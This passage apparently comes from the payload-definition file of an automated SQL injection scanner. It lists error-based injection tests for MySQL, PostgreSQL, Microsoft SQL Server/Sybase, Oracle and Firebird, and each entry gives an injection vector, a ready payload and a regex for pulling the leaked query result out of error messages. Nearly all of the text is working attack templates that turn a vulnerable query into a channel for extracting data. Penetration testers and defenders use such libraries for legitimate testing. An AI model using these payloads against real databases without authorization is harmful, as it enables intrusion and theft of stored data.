||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 4.1 AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
|
||||
<request>
|
||||
<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 4.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
|
||||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
<dbms_version>>= 8.1.6</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Firebird AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
|
||||
<request>
|
||||
<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 4.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
|
||||
<request>
|
||||
<payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
<dbms_version>>= 8.1.6</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Firebird OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!--
|
||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||
and SAP MaxDB - no known techniques at this time
|
||||
-->
|
||||
<!-- End of error-based tests - WHERE or HAVING clause -->
|
||||
|
||||
<!-- Error-based tests - After ORDER BY...LIMIT... -->
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
|
||||
<request>
|
||||
<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of error-based tests - After ORDER BY...LIMIT... -->
|
||||
|
||||
<!-- Error-based tests - Parameter replace -->
|
||||
<test>
|
||||
<title>MySQL >= 5.0 error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
|
||||
<request>
|
||||
<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
|
||||
<request>
|
||||
<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
